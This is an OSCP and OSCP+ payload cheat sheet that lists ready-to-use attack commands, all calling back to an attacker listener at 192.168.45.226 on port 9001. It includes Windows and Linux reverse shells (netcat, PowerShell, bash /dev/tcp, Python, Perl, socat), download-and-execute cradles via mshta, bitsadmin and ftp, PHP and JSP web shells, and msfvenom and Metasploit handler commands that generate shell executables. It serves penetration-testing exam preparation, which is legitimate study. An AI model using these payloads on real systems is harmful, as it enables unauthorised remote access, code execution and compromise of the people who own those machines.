OSCP & OSCP+ Payload Cheat Sheet

📌 Table of Contents

  1. Windows Payloads
  2. Linux Payloads
  3. Web Payloads
  4. Metasploit Multi-Handler Setup
  5. Msfvenom Payload Generation
  6. Staged vs Stageless Payloads

Windows Payloads

Manual Reverse Shells

Netcat

nc.exe -e cmd.exe 192.168.45.226 9001
nc.exe -nv 192.168.45.226 9001 -e cmd.exe

PowerShell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Cmd.exe

cmd.exe /c "echo open 192.168.45.226 9001 > ftp.txt && echo user anonymous >> ftp.txt && echo binary >> ftp.txt && echo get reverse_shell.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt"

Bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http://192.168.45.226/malware.exe C:\Windows\Temp\malware.exe

Mshta

mshta "javascript:a=new ActiveXObject('WScript.Shell'); a.Run('cmd.exe /c powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(''http://192.168.45.226/shell.ps1'')'); close();"

Linux Payloads

Manual Reverse Shells

Netcat

nc -e /bin/bash 192.168.45.226 9001

Bash

bash -i >& /dev/tcp/192.168.45.226/9001 0>&1
/bin/sh -i >& /dev/tcp/192.168.45.226/9001 0>&1

Python

python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.226",9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="192.168.45.226";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Socat

socat TCP4:192.168.45.226:9001 EXEC:/bin/bash

Web Payloads

PHP Reverse Shell

php -r '$sock=fsockopen("192.168.45.226",9001);exec("/bin/sh -i <&3 >&3 2>&3");'

JSP Reverse Shell

<% Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/192.168.45.226/9001 0>&1'"); %>

WAR (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f war > shell.war

Metasploit Multi-Handler Setup

msfconsole
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST 192.168.45.226
set LPORT 9001
exploit

Msfvenom Payload Generation

Windows (Non-Meterpreter)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f exe > shell.exe

Linux (Non-Meterpreter)

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f elf > shell.elf

macOS

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f macho > shell.macho

Python

msfvenom -p python/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f raw > shell.py

Web Payloads (Msfvenom)

PHP

msfvenom -p php/reverse_php LHOST=192.168.45.226 LPORT=9001 -f raw > shell.php

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f raw > shell.jsp

WAR (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f war > shell.war

Staged vs Stageless Payloads

Staged Payload (small stager; the rest of the payload is fetched from the handler, so it requires a Metasploit multi/handler with the matching staged payload set)

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f exe > shell.exe

Stageless Payload (larger; the whole payload is embedded, so it runs independently and works with a plain listener such as netcat)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.226 LPORT=9001 -f exe > shell.exe